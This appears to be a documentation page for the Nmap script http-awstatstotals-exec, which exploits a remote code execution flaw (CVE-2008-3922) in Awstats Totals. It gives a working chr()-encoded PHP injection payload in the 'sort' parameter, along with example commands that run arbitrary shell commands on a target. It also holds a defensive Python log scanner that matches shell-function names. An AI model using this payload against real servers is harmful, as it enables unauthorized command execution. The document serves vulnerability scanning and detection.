
File http-awstatstotals-exec

Script type: portrule
Script categories: vuln, intrusive, exploit
Script download URL: http://nmap.org/svn/scripts/http-awstatstotals-exec.nse

User Summary

Exploits a remote code execution vulnerability in Awstats Totals 1.0 up to 1.14 and possibly other products based on it (CVE-2008-3922).

This vulnerability can be exploited through the GET variable sort. The script queries the web server with the command payload encoded using PHP's chr() function: ?sort={%24{passthru%28chr(117).chr(110).chr(97).chr(109).chr(101).chr(32).chr(45).chr(97)%29}}{%24{exit%28%29}}
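As an added defender-side example (not part of the Nmap script or of this page), the following Python scans web-server access-log lines for a sort parameter carrying the ${passthru(...)} shape described above and decodes the chr() chain back into the command that was sent, so a detection rule can log what was attempted rather than just the raw request. The log lines, client IPs and request paths are constructed for the example.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed sample access-log lines (not real traffic). The first line carries the
# chr()-encoded payload shape documented for CVE-2008-3922; the others are benign.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:12:00:00 +0000] "GET /awstats/index.php?sort={%24{passthru%28chr(117).chr(110).chr(97).chr(109).chr(101).chr(32).chr(45).chr(97)%29}}{%24{exit%28%29}} HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.6 - - [01/Jan/2024:12:00:01 +0000] "GET /awstats/index.php?sort=pages HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
10.0.0.7 - - [01/Jan/2024:12:00:02 +0000] "GET /index.php?sort=unique HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

# Request target inside the quoted request line of a combined-format log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# One PHP chr(n) call; the payload concatenates these with '.' to build a string.
CHR_RE = re.compile(r'chr\((\d+)\)')
# PHP functions that hand their argument to a shell; passthru() is the one on this page.
SHELL_FUNC_RE = re.compile(r'\b(passthru|system|exec|shell_exec)\s*\(')


def decode_chr_chain(value):
    """Rebuild the string a chr(a).chr(b)... concatenation evaluates to."""
    return "".join(chr(int(n)) for n in CHR_RE.findall(value))


def inspect_sort_param(raw_url):
    """Return the decoded command if the sort parameter carries the ${...}
    injection shape, else None. parse_qs already undoes percent-encoding."""
    query = urlparse(raw_url).query
    for sort_value in parse_qs(query, keep_blank_values=True).get("sort", []):
        if "${" in sort_value and SHELL_FUNC_RE.search(sort_value):
            # Fall back to the raw value when the command is not chr()-encoded.
            return decode_chr_chain(sort_value) or sort_value
    return None


def find_exploit_attempts(log_text):
    """Scan log lines and return (client_ip, decoded_command) for each hit."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        command = inspect_sort_param(match.group(1))
        if command is not None:
            hits.append((line.split(" ", 1)[0], command))
    return hits


if __name__ == "__main__":
    for ip, cmd in find_exploit_attempts(SAMPLE_LOG):
        print(f"{ip} attempted command: {cmd!r}")
```

The user agent is deliberately not used as a signal, since the script's http.useragent argument lets a scanner set any value it likes.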

Common paths for Awstats Total:

References:

Script Arguments

http-awstatstotals-exec.uri

Awstats Totals URI including path. Default: /index.php

http-awstatstotals-exec.cmd

Command to execute. Default: whoami

http-awstatstotals-exec.outfile

Output file. If set it saves the output in this file.

Other useful args when running this script: http.useragent - User Agent to use in GET request

smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername

See the documentation for the smbauth library.

http.max-cache-size, http.max-pipeline, http.pipeline, http.useragent

See the documentation for the http library.

Example Usage

Command format

nmap -sV --script http-awstatstotals-exec.nse --script-args 'http-awstatstotals-exec.cmd="uname -a", http-awstatstotals-exec.uri=/awstats/index.php' <target>
nmap -sV --script http-awstatstotals-exec.nse <target>

Script Output

PORT   STATE SERVICE REASON
80/tcp open  http    syn-ack
| http-awstatstotals-exec.nse:
|_Output for 'uname -a':Linux 2.4.19 #1 Son Apr 14 09:53:28 CEST 2002 i686 GNU/Linux

Requires


Author: Paulino Calderon

License: compiled by VER007 http://www.ver007.com